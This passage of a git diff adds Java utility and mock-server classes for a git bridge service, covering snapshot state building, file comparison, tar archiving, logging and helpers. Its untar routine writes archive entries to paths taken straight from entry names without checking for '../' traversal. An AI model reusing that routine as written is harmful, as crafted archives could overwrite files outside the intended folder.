uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultOutOfDate; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultSuccess; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.*; + +/* + * Created by Winston on 11/01/15. + */ +public class SnapshotAPIStateBuilder { + + private final JsonArray projects; + + private Map<String, GetDocResult> getDoc = new HashMap<>(); + private Map<String, GetSavedVersResult> getSavedVers = new HashMap<>(); + private Map<String, Map<Integer, GetForVersionResult>> getForVers = new HashMap<>(); + private Map<String, SnapshotPushResult> push = new HashMap<>(); + private Map<String, SnapshotPostbackRequest> postback = new HashMap<>(); + + public SnapshotAPIStateBuilder(InputStream stream) { + projects = new Gson().fromJson(new InputStreamReader(stream), JsonArray.class); + } + + public SnapshotAPIState build() { + for (JsonElement project : projects) { + addProject(project.getAsJsonObject()); + } + return new SnapshotAPIState(getDoc, getSavedVers, getForVers, push, postback); + } + + private void addProject(JsonObject project) { + String projectName = project.get("project").getAsString(); + addGetDocForProject(projectName, project.get("getDoc").getAsJsonObject()); + addGetSavedVersForProject(projectName, project.get("getSavedVers").getAsJsonArray()); + addGetForVersForProject(projectName, project.get("getForVers").getAsJsonArray()); + addPushForProject(projectName, project.get("push").getAsString()); + addPostbackForProject(projectName, project.get("postback").getAsJsonObject()); + } + + private void addGetDocForProject(String projectName, JsonObject jsonGetDoc) { + int versionID = jsonGetDoc.get("versionID").getAsInt(); + String createdAt = null; + String email = null; + String name = null; + if (jsonGetDoc.has("createdAt")) { + createdAt = jsonGetDoc.get("createdAt").getAsString(); + } + if (jsonGetDoc.has("email")) { + email = jsonGetDoc.get("email").getAsString(); + } + if (jsonGetDoc.has("name")) { + name = jsonGetDoc.get("name").getAsString(); + } + getDoc.put( + projectName, new GetDocResult(jsonGetDoc.get("error"), versionID, createdAt, email, name)); + } + + private void addGetSavedVersForProject(String projectName, JsonArray jsonGetSavedVers) { + List<SnapshotInfo> savedVers = new ArrayList<>(); + for (JsonElement ver : jsonGetSavedVers) { + savedVers.add(getSnapshotInfo(ver.getAsJsonObject())); + } + getSavedVers.put(projectName, new GetSavedVersResult(savedVers)); + } + + private SnapshotInfo getSnapshotInfo(JsonObject jsonSnapshotInfo) { + return new SnapshotInfo( + jsonSnapshotInfo.get("versionID").getAsInt(), + jsonSnapshotInfo.get("comment").getAsString(), + jsonSnapshotInfo.get("email").getAsString(), + jsonSnapshotInfo.get("name").getAsString(), + jsonSnapshotInfo.get("createdAt").getAsString()); + } + + private void addGetForVersForProject(String projectName, JsonArray jsonGetForVers) { + Map<Integer, GetForVersionResult> forVers = new HashMap<>(); + for (JsonElement forVer : jsonGetForVers) { + JsonObject forVerObj = forVer.getAsJsonObject(); + forVers.put( + forVerObj.get("versionID").getAsInt(), + new GetForVersionResult( + new SnapshotData( + getSrcs(forVerObj.get("srcs").getAsJsonArray()), + getAtts(forVerObj.get("atts").getAsJsonArray())))); + } + getForVers.put(projectName, forVers); + } + + private List<SnapshotFile> getSrcs(JsonArray jsonSrcs) { + List<SnapshotFile> srcs = new ArrayList<>(); + for (JsonElement src : jsonSrcs) { + srcs.add(getSrc(src.getAsJsonObject())); + } + return srcs; + } + + private SnapshotFile getSrc(JsonObject jsonSrc) { + return new SnapshotFile( + jsonSrc.get("content").getAsString(), jsonSrc.get("path").getAsString()); + } + + private List<SnapshotAttachment> getAtts(JsonArray jsonAtts) { + List<SnapshotAttachment> atts = new LinkedList<>(); + for (JsonElement att : jsonAtts) { + atts.add(getAtt(att.getAsJsonObject())); + } + return atts; + } + + private SnapshotAttachment getAtt(JsonObject jsonAtt) { + return new SnapshotAttachment( + jsonAtt.get("url").getAsString(), jsonAtt.get("path").getAsString()); + } + + private void addPushForProject(String projectName, String jsonPush) { + SnapshotPushResult p; + if (jsonPush.equals("success")) { + p = new SnapshotPushResultSuccess(); + } else if (jsonPush.equals("outOfDate")) { + p = new SnapshotPushResultOutOfDate(); + } else { + throw new IllegalArgumentException("invalid push"); + } + push.put(projectName, p); + } + + private void addPostbackForProject(String projectName, JsonObject jsonPostback) { + SnapshotPostbackRequest p; + String type = jsonPostback.get("type").getAsString(); + if (type.equals("success")) { + p = new SnapshotPostbackRequestSuccess(jsonPostback.get("versionID").getAsInt()); + } else if (type.equals("outOfDate")) { + p = new SnapshotPostbackRequestOutOfDate(); + } else if (type.equals("invalidFiles")) { + p = new SnapshotPostbackRequestInvalidFiles(jsonPostback.get("errors").getAsJsonArray()); + } else if (type.equals("invalidProject")) { + p = new SnapshotPostbackRequestInvalidProject(jsonPostback.get("errors").getAsJsonArray()); + } else if (type.equals("error")) { + p = new SnapshotPostbackRequestError(); + } else { + throw new IllegalArgumentException("invalid postback type"); + } + postback.put(projectName, p); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java new file mode 100644 index 0000000..380c005 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtil.java @@ -0,0 +1,142 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.util; + +import com.google.common.collect.ImmutableSet; +import java.io.File; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.*; +import java.util.stream.Collectors; +import java.util.stream.Stream; +import org.eclipse.jgit.api.Git; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.eclipse.jgit.api.errors.NoHeadException; +import org.eclipse.jgit.revwalk.RevCommit; +import org.eclipse.jgit.storage.file.FileRepositoryBuilder; + +/* + * Created by Winston on 11/01/15. + */ +public class FileUtil { + + public static boolean currentCommitsAreEqual(Path dir1, Path dir2) { + try { + RevCommit commit1 = + new Git(new FileRepositoryBuilder().setWorkTree(dir1.toFile().getAbsoluteFile()).build()) + .log() + .call() + .iterator() + .next(); + RevCommit commit2 = + new Git(new FileRepositoryBuilder().setWorkTree(dir2.toFile().getAbsoluteFile()).build()) + .log() + .call() + .iterator() + .next(); + return commit1.equals(commit2); + } catch (IOException e) { + throw new RuntimeException(e); + } catch (NoHeadException e) { + return false; + } catch (GitAPIException e) { + throw new RuntimeException(e); + } + } + + public static boolean gitDirectoriesAreEqual(Path dir1, Path dir2) { + Set<String> dir1Contents = getAllRecursivelyInDirectoryApartFrom(dir1, dir1.resolve(".git")); + Set<String> dir2Contents = getAllRecursivelyInDirectoryApartFrom(dir2, dir2.resolve(".git")); + return filesAreEqual(dir1, dir2, dir1Contents, dir2Contents); + } + + public static boolean directoryDeepEquals(File dir, File dir_) { + return directoryDeepEquals(dir.toPath(), dir_.toPath()); + } + + public static boolean directoryDeepEquals(Path path, Path path_) { + List<Set<String>> contents = + Stream.of(path, path_) + .map(p -> getAllFilesRecursively(p, p, Collections.emptySet(), true)) + .collect(Collectors.toList()); + return filesAreEqual(path, path_, contents.get(0), contents.get(1)); + } + + private static boolean filesAreEqual( + Path dir1, Path dir2, Set<String> dir1Contents, Set<String> dir2Contents) { + boolean filesEqual = dir1Contents.equals(dir2Contents); + if (!filesEqual) { + System.out.println("Not equal: (" + dir1Contents + ", " + dir2Contents + ")"); + System.out.println(dir1 + ": " + dir1Contents); + System.out.println(dir2 + ": " + dir2Contents); + } + return filesEqual && directoryContentsEqual(dir1Contents, dir1, dir2); + } + + static boolean directoryContentsEqual(Set<String> dirContents, Path dir1, Path dir2) { + for (String file : dirContents) { + Path path1 = dir1.resolve(file); + Path path2 = dir2.resolve(file); + if (!path1.toFile().isDirectory() + && !path2.toFile().isDirectory() + && !fileContentsEqual(path1, path2)) { + return false; + } + } + return true; + } + + private static boolean fileContentsEqual(Path first, Path second) { + try { + byte[] firstContents = Files.readAllBytes(first); + byte[] secondContents = Files.readAllBytes(second); + boolean equals = Arrays.equals(firstContents, secondContents); + if (!equals) { + System.out.println("Not equal: (" + first + ", " + second + ")"); + System.out.println(first + ": " + new String(firstContents)); + System.out.println(second + ": " + new String(secondContents)); + } + return equals; + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + public static Set<String> getAllRecursivelyInDirectoryApartFrom(Path dir, Path excluded) { + return getAllRecursivelyInDirectoryApartFrom(dir, excluded, true); + } + + public static Set<String> getOnlyFilesRecursivelyInDirectoryApartFrom(Path dir, Path excluded) { + return getAllRecursivelyInDirectoryApartFrom(dir, excluded, false); + } + + private static Set<String> getAllRecursivelyInDirectoryApartFrom( + Path dir, Path excluded, boolean directories) { + if (!dir.toFile().isDirectory()) { + throw new IllegalArgumentException("need a directory"); + } + return getAllFilesRecursively(dir, dir, ImmutableSet.of(excluded.toFile()), directories); + } + + private static final Set<String> ExcludedNames = ImmutableSet.of(".DS_Store"); + + static Set<String> getAllFilesRecursively( + Path baseDir, Path dir, Set<File> excluded, boolean directories) { + Set<String> files = new HashSet<String>(); + for (File file : dir.toFile().listFiles()) { + if (excluded.contains(file)) { + continue; + } + if (ExcludedNames.contains(file.getName())) { + continue; + } + boolean isDirectory = file.isDirectory(); + if (directories || !isDirectory) { + files.add(baseDir.relativize(file.toPath()).toString()); + } + if (isDirectory) { + files.addAll(getAllFilesRecursively(baseDir, file.toPath(), excluded, directories)); + } + } + return files; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java new file mode 100644 index 0000000..f1384ea --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/BiConsumerT.java @@ -0,0 +1,10 @@ +package uk.ac.ic.wlgitbridge.util; + +/* + * BiConsumer interface that allows checked exceptions. + */ +@FunctionalInterface +public interface BiConsumerT<T, U, E extends Throwable> { + + void accept(T t, U u) throws E; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java new file mode 100644 index 0000000..a19218a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/DeletingFileInputStream.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.io.*; + +/* + * A {@link java.io.FileInputStream} which deletes the underlying + * {@link java.io.File} on close. + * + * @author Michael Walker (barrucadu) {@literal <mike@barrucadu.co.uk>} + */ +public class DeletingFileInputStream extends FileInputStream { + private File file; + + /* + * Creates a {@link java.io.FileInputStream} by opening a + * connection to an actual file, the file named by the + * {@link java.io.File} object file in the file system. + * + * When the {@link close} method is called, the {@code File} will + * be deleted. + */ + public DeletingFileInputStream(File file) throws FileNotFoundException { + super(file); + this.file = file; + } + + /* + * Closes this input stream and deletes the underlying file. + */ + @Override + public void close() throws IOException { + try { + super.close(); + } finally { + if (file != null) { + file.delete(); + file = null; + } + } + } + + /* + * We shouldn't rely on this for correctness! + */ + @Override + protected void finalize() throws Throwable { + try { + super.finalize(); + } finally { + if (file != null) { + Log.warn("File open at finalization time: {}", file.getCanonicalPath()); + try { + close(); + } catch (IOException e) { + Log.error("Failed to delete file", e); + } + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java new file mode 100644 index 0000000..bd41161 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Files.java @@ -0,0 +1,98 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.io.UncheckedIOException; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.Set; +import java.util.stream.Collectors; +import org.apache.commons.io.FileUtils; +import org.apache.commons.io.filefilter.TrueFileFilter; + +/* + * Created by winston on 23/08/2016. + */ +public class Files { + + private Files() {} + + public static boolean contentsAreEqual(File f0, File f1) throws IOException { + try { + return uncheckedContentsAreEqual(f0, f1); + } catch (UncheckedIOException e) { + throw e.getCause(); + } + } + + public static void renameAll(File fileOrDir, String from, String to) { + if (fileOrDir.isDirectory()) { + File f = doRename(fileOrDir, from, to); + for (File c : f.listFiles()) { + renameAll(c, from, to); + } + } else if (fileOrDir.isFile()) { + doRename(fileOrDir, from, to); + } else { + throw new IllegalArgumentException("not a file or dir: " + fileOrDir); + } + } + + private static File doRename(File fileOrDir, String from, String to) { + if (!fileOrDir.getName().equals(from)) { + return fileOrDir; + } + File renamed = new File(fileOrDir.getParent(), to); + Preconditions.checkState(fileOrDir.renameTo(renamed)); + return renamed; + } + + private static boolean uncheckedContentsAreEqual(File f0, File f1) throws IOException { + if (f0.equals(f1)) { + return true; + } + if (!f0.isDirectory() || !f1.isDirectory()) { + return !f0.isDirectory() + && !f1.isDirectory() + && Arrays.equals(FileUtils.readFileToByteArray(f0), FileUtils.readFileToByteArray(f1)); + } + Path f0Base = Paths.get(f0.getAbsolutePath()); + Path f1Base = Paths.get(f1.getAbsolutePath()); + Set<Path> children0 = getChildren(f0, f0Base); + Set<Path> children1 = getChildren(f1, f1Base); + if (children0.size() != children1.size()) { + return false; + } + return children0.stream() + .allMatch(c0 -> children1.contains(c0) && childEquals(c0, f0Base, f1Base)); + } + + private static Set<Path> getChildren(File f0, Path f0Base) { + return FileUtils.listFilesAndDirs(f0, TrueFileFilter.TRUE, TrueFileFilter.TRUE).stream() + .map(File::getAbsolutePath) + .map(Paths::get) + .map(p -> f0Base.relativize(p)) + .filter(p -> !p.toString().isEmpty()) + .collect(Collectors.toSet()); + } + + private static boolean childEquals(Path child, Path f0Base, Path f1Base) + throws UncheckedIOException { + File c0 = f0Base.resolve(child).toFile(); + File c1 = f1Base.resolve(child).toFile(); + boolean c0IsDir = c0.isDirectory(); + boolean c1IsDir = c1.isDirectory(); + if (c0IsDir || c1IsDir) { + return c0IsDir && c1IsDir; + } + try { + return c0.isFile() + && c1.isFile() + && Arrays.equals(FileUtils.readFileToByteArray(c0), FileUtils.readFileToByteArray(c1)); + } catch (IOException e) { + throw new UncheckedIOException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java new file mode 100644 index 0000000..43d58dd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/FunctionT.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.util; + +/* + * Function interface that allows checked exceptions. + * @param <T> + * @param <R> + * @param <E> + */ +@FunctionalInterface +public interface FunctionT<T, R, E extends Throwable> { + + R apply(T t) throws E; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java new file mode 100644 index 0000000..1b55416 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Instance.java @@ -0,0 +1,26 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.http.HttpRequestFactory; +import com.google.api.client.http.HttpTransport; +import com.google.api.client.http.javanet.NetHttpTransport; +import com.google.api.client.json.JsonFactory; +import com.google.api.client.json.gson.GsonFactory; +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; + +/* + * Created by winston on 25/10/15. + */ +public class Instance { + + public static final HttpTransport httpTransport = new NetHttpTransport(); + + public static final HttpRequestFactory httpRequestFactory = httpTransport.createRequestFactory(); + + public static final JsonFactory jsonFactory = new GsonFactory(); + + public static final Gson prettyGson = + new GsonBuilder().setPrettyPrinting().serializeNulls().disableHtmlEscaping().create(); + + public static final Gson gson = new Gson(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java new file mode 100644 index 0000000..92b7d94 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Log.java @@ -0,0 +1,85 @@ +package uk.ac.ic.wlgitbridge.util; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import uk.ac.ic.wlgitbridge.application.GitBridgeApp; + +/* + * Created by winston on 19/01/2016. + */ +public class Log { + + private static Logger logger = LoggerFactory.getLogger(GitBridgeApp.class); + + public static void trace(String msg) { + logger.trace(msg); + } + + public static void trace(String msg, Throwable t) { + logger.trace(msg, t); + } + + public static void debug(String msg) { + logger.debug(msg); + } + + public static void debug(String msg, Throwable t) { + logger.debug(msg, t); + } + + public static void debug(String format, Object... args) { + logger.debug(format, args); + } + + public static void info(String msg) { + logger.info(msg); + } + + public static void info(String format, Object arg) { + logger.info(format, arg); + } + + public static void info(String format, Object arg1, Object arg2) { + logger.info(format, arg1, arg2); + } + + public static void info(String format, Object... args) { + logger.info(format, args); + } + + public static void info(String msg, Throwable t) { + logger.info(msg, t); + } + + public static void warn(String msg) { + logger.warn(msg); + } + + public static void warn(String msg, Object arg) { + logger.warn(msg, arg); + } + + public static void warn(String msg, Object arg1, Object arg2) { + logger.warn(msg, arg1, arg2); + } + + public static void warn(String msg, Object... args) { + logger.warn(msg, args); + } + + public static void warn(String msg, Throwable t) { + logger.warn(msg, t); + } + + public static void error(String msg) { + logger.error(msg); + } + + public static void error(String msg, Object... args) { + logger.error(msg, args); + } + + public static void error(String msg, Throwable t) { + logger.error(msg, t); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java new file mode 100644 index 0000000..a6e0fa4 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Project.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.common.base.Preconditions; + +/* + * Created by winston on 23/08/2016. + */ +public class Project { + + public static boolean isValidProjectName(String projectName) { + return projectName != null && !projectName.isEmpty() && !projectName.startsWith("."); + } + + public static void checkValidProjectName(String projectName) { + Preconditions.checkArgument( + isValidProjectName(projectName), "[%s] invalid project name", projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java new file mode 100644 index 0000000..6899541 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/ResourceUtil.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.io.File; +import java.io.IOException; +import org.apache.commons.io.FileUtils; + +public class ResourceUtil { + + /* + * Creates a copy of a resource folder. Mainly used for testing to prevent + * the original folder from being mangled. + * + * It will have the same name as the original. + * @param resource the resource name, e.g. "/uk/ac/ic/wlgitbridge/file.txt" + * @param folderProvider function used to create the folder. + * E.g. TemporaryFolder from junit + * @return + * @throws IOException + */ + public static File copyOfFolderResource( + String resource, FunctionT<String, File, IOException> folderProvider) throws IOException { + File original = new File(ResourceUtil.class.getResource(resource).getFile()); + File tmp = folderProvider.apply(original.getName()); + FileUtils.copyDirectory(original, tmp); + return tmp; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java new file mode 100644 index 0000000..512babf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Tar.java @@ -0,0 +1,171 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.*; +import java.nio.file.Path; +import java.nio.file.Paths; +import org.apache.commons.compress.archivers.ArchiveEntry; +import org.apache.commons.compress.archivers.tar.TarArchiveEntry; +import org.apache.commons.compress.archivers.tar.TarArchiveInputStream; +import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; +import org.apache.commons.compress.compressors.bzip2.BZip2CompressorInputStream; +import org.apache.commons.compress.compressors.bzip2.BZip2CompressorOutputStream; +import org.apache.commons.compress.compressors.gzip.GzipCompressorInputStream; +import org.apache.commons.compress.compressors.gzip.GzipCompressorOutputStream; +import org.apache.commons.compress.utils.IOUtils; + +/* + * Tar utilities. + * + * The resource returned by zip and tar are treated as unowned. + * + * The resource given to unzip is treated as unowned. + * + * Caller is responsible for all resources. + */ +public class Tar { + public static class gzip { + + public static InputStream zip(File fileOrDir) throws IOException { + return zip(fileOrDir, null); + } + + public static InputStream zip(File fileOrDir, long[] sizePtr) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar.gz"); + tmp.deleteOnExit(); + OutputStream target = new FileOutputStream(tmp); + /* Closes target */ + try (OutputStream gz = new GzipCompressorOutputStream(target)) { + tarTo(fileOrDir, gz); + } catch (IOException e) { + tmp.delete(); + throw e; + } + if (sizePtr != null) { + sizePtr[0] = tmp.length(); + } + return new DeletingFileInputStream(tmp); + } + + public static void unzip(InputStream targz, File parentDir) throws IOException { + /* GzipCompressorInputStream does not need closing + Closing it would close targz which we should not do */ + InputStream tar = new GzipCompressorInputStream(targz); + untar(tar, parentDir); + } + } + + public static class bz2 { + + public static InputStream zip(File fileOrDir) throws IOException { + return zip(fileOrDir, null); + } + + public static InputStream zip(File fileOrDir, long[] sizePtr) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar.bz2"); + tmp.deleteOnExit(); + OutputStream target = new FileOutputStream(tmp); + /* Closes target */ + try (OutputStream bzip2 = new BZip2CompressorOutputStream(target)) { + tarTo(fileOrDir, bzip2); + } catch (IOException e) { + tmp.delete(); + throw e; + } + if (sizePtr != null) { + sizePtr[0] = tmp.length(); + } + return new DeletingFileInputStream(tmp); + } + + public static void unzip(InputStream tarbz2, File parentDir) throws IOException { + /* BZip2CompressorInputStream does not need closing + Closing it would close tarbz2 which we should not do */ + InputStream tar = new BZip2CompressorInputStream(tarbz2); + untar(tar, parentDir); + } + } + + private Tar() {} + + public static InputStream tar(File fileOrDir) throws IOException { + File tmp = File.createTempFile(fileOrDir.getName(), ".tar"); + tmp.deleteOnExit(); + try (FileOutputStream target = new FileOutputStream(tmp)) { + tarTo(fileOrDir, target); + return new DeletingFileInputStream(tmp); + } catch (IOException e) { + tmp.delete(); + throw e; + } + } + + public static void tarTo(File fileOrDir, OutputStream target) throws IOException { + try (TarArchiveOutputStream tout = new TarArchiveOutputStream(target)) { + addTarEntry(tout, Paths.get(fileOrDir.getParentFile().getAbsolutePath()), fileOrDir); + } + } + + public static void untar(InputStream tar, File parentDir) throws IOException { + TarArchiveInputStream tin = new TarArchiveInputStream(tar); + ArchiveEntry e; + while ((e = tin.getNextEntry()) != null) { + File f = new File(parentDir, e.getName()); + f.setLastModified(e.getLastModifiedDate().getTime()); + f.getParentFile().mkdirs(); + if (e.isDirectory()) { + f.mkdir(); + continue; + } + long size = e.getSize(); + checkFileSize(size); + try (OutputStream out = new FileOutputStream(f)) { + /* TarInputStream pretends each + entry's EOF is the stream's EOF */ + IOUtils.copy(tin, out); + } + } + } + + private static void checkFileSize(long size) { + Preconditions.checkArgument( + size >= 0 && size <= Integer.MAX_VALUE, + "file too big (" + size + " B): " + "tarTo should have thrown an IOException"); + } + + private static void addTarEntry(TarArchiveOutputStream tout, Path base, File fileOrDir) + throws IOException { + if (fileOrDir.isDirectory()) { + addTarDir(tout, base, fileOrDir); + } else if (fileOrDir.isFile()) { + addTarFile(tout, base, fileOrDir); + } else { + throw new IllegalArgumentException("invalid file or dir: " + fileOrDir); + } + } + + private static void addTarDir(TarArchiveOutputStream tout, Path base, File dir) + throws IOException { + Preconditions.checkArgument(dir.isDirectory()); + String name = base.relativize(Paths.get(dir.getAbsolutePath())).toString(); + TarArchiveEntry entry = tout.createArchiveEntry(dir, name); + tout.putArchiveEntry(entry); + tout.closeArchiveEntry(); + for (File f : dir.listFiles()) { + addTarEntry(tout, base, f); + } + } + + private static void addTarFile(TarArchiveOutputStream tout, Path base, File file) + throws IOException { + Preconditions.checkArgument(file.isFile(), "given file" + " is not file: %s", file); + checkFileSize(file.length()); + String name = base.relativize(Paths.get(file.getAbsolutePath())).toString(); + TarArchiveEntry entry = tout.createArchiveEntry(file, name); + tout.putArchiveEntry(entry); + try (InputStream in = new FileInputStream(file)) { + IOUtils.copy(in, tout); + } + tout.closeArchiveEntry(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java new file mode 100644 index 0000000..f432f1d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/TimerUtils.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.util; + +import java.util.TimerTask; + +/* + * Created by winston on 23/08/2016. + */ +public class TimerUtils { + + public static TimerTask makeTimerTask(Runnable lamb) { + return new TimerTask() { + @Override + public void run() { + try { + lamb.run(); + } catch (Throwable t) { + Log.warn("Error on timer", t); + } + } + }; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java new file mode 100644 index 0000000..57eeb11 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/util/Util.java @@ -0,0 +1,187 @@ +package uk.ac.ic.wlgitbridge.util; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.*; +import java.text.DateFormat; +import java.text.SimpleDateFormat; +import java.util.*; + +/* + * Created by Winston on 19/11/14. + */ +public class Util { + + private static String SERVICE_NAME; + private static String HOSTNAME; + private static int PORT; + private static String POSTBACK_URL; + private static final DateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSSSSS"); + + public static String entries(int entries) { + if (entries == 1) { + return "entry"; + } else { + return "entries"; + } + } + + public static int booleanToInt(boolean b) { + if (b) { + return 1; + } else { + return 0; + } + } + + public static boolean intToBoolean(int i) { + return i != 0; + } + + private static String removeAllSuffix(String str, String suffix) { + int lastIndexOfSuffix; + String result = str; + while ((lastIndexOfSuffix = result.lastIndexOf(suffix)) > -1) { + result = result.substring(0, lastIndexOfSuffix); + } + return result; + } + + /* removeAllSuffixes("something.git///", "/", ".git") => "something" */ + public static String removeAllSuffixes(String str, String... suffixes) { + String result = str; + for (String suffix : suffixes) { + result = removeAllSuffix(result, suffix); + } + return result; + } + + public static String getContentsOfReader(BufferedReader reader) throws IOException { + StringBuilder sb = new StringBuilder(); + for (String line; (line = reader.readLine()) != null; ) { + sb.append(line); + } + return sb.toString(); + } + + public static void setServiceName(String serviceName) { + SERVICE_NAME = serviceName; + } + + public static String getServiceName() { + return SERVICE_NAME; + } + + public static int getPort() { + return PORT; + } + + public static void setPort(int port) { + PORT = port; + } + + public static void setPostbackURL(String postbackURL) { + POSTBACK_URL = postbackURL; + } + + public static String getPostbackURL() { + return POSTBACK_URL; + } + + public static void deleteDirectory(File directory) { + if (directory != null) { + deleteInDirectory(directory); + directory.delete(); + } + } + + public static void deleteInDirectory(File directory) { + if (directory != null) { + deleteInDirectoryApartFrom(directory); + } + } + + public static void deleteInDirectoryApartFrom(File directory, String... apartFrom) { + if (directory != null) { + Set<String> excluded = new HashSet<>(Arrays.asList(apartFrom)); + File[] files = directory.listFiles(); + if (files != null) { + for (File file : files) { + if (!excluded.contains(file.getName())) { + if (file.isDirectory()) { + deleteInDirectory(file); + } + file.delete(); + Log.debug("Deleted file: {}", file.getAbsolutePath()); + } + } + } + } + } + + public static List<String> linesFromStream(InputStream stream, int skip, String trimSuffix) + throws IOException { + List<String> lines = new ArrayList<>(); + BufferedReader reader = new BufferedReader(new InputStreamReader(stream)); + String line; + for (int i = 0; i < skip; i++) { + reader.readLine(); + } + while ((line = reader.readLine()) != null) { + String trim = line.trim(); + trim = trim.replaceAll("\\p{C}", ""); + int endIndex = trim.lastIndexOf(trimSuffix); + if (endIndex >= 0) { + trim = trim.substring(0, endIndex); + } + lines.add(trim); + } + return lines; + } + + public static String fromStream(InputStream stream, int skip) throws IOException { + BufferedReader reader = new BufferedReader(new InputStreamReader(stream)); + StringBuilder out = new StringBuilder(); + String newLine = System.getProperty("line.separator"); + String line; + for (int i = 0; i < skip; i++) { + reader.readLine(); + } + while ((line = reader.readLine()) != null) { + out.append(line); + out.append(newLine); + } + return out.toString(); + } + + public static String fromStream(InputStream stream) throws IOException { + return fromStream(stream, 0); + } + + public static String getCodeFromResponse(JsonObject json) { + String code = "error"; + JsonElement codeElement = json.get("code"); + + if (codeElement == null) { + String error = "Unexpected error"; + Log.warn("Unexpected response from API:"); + Log.warn(json.toString()); + Log.warn("End of response"); + JsonElement statusElement = json.get("status"); + if (statusElement != null) { + String status = statusElement.getAsString(); + if (status.equals("422")) { + error = "Unprocessable entity"; + } else if (status.equals("404")) { + error = "Not found"; + } else if (status.equals("403")) { + error = "Forbidden"; + } + } + throw new RuntimeException(error); + } else { + code = codeElement.getAsString(); + } + return code; + } +} diff --git a/services/git-bridge/src/main/resources/logback.xml b/services/git-bridge/src/main/resources/logback.xml new file mode 100644 index 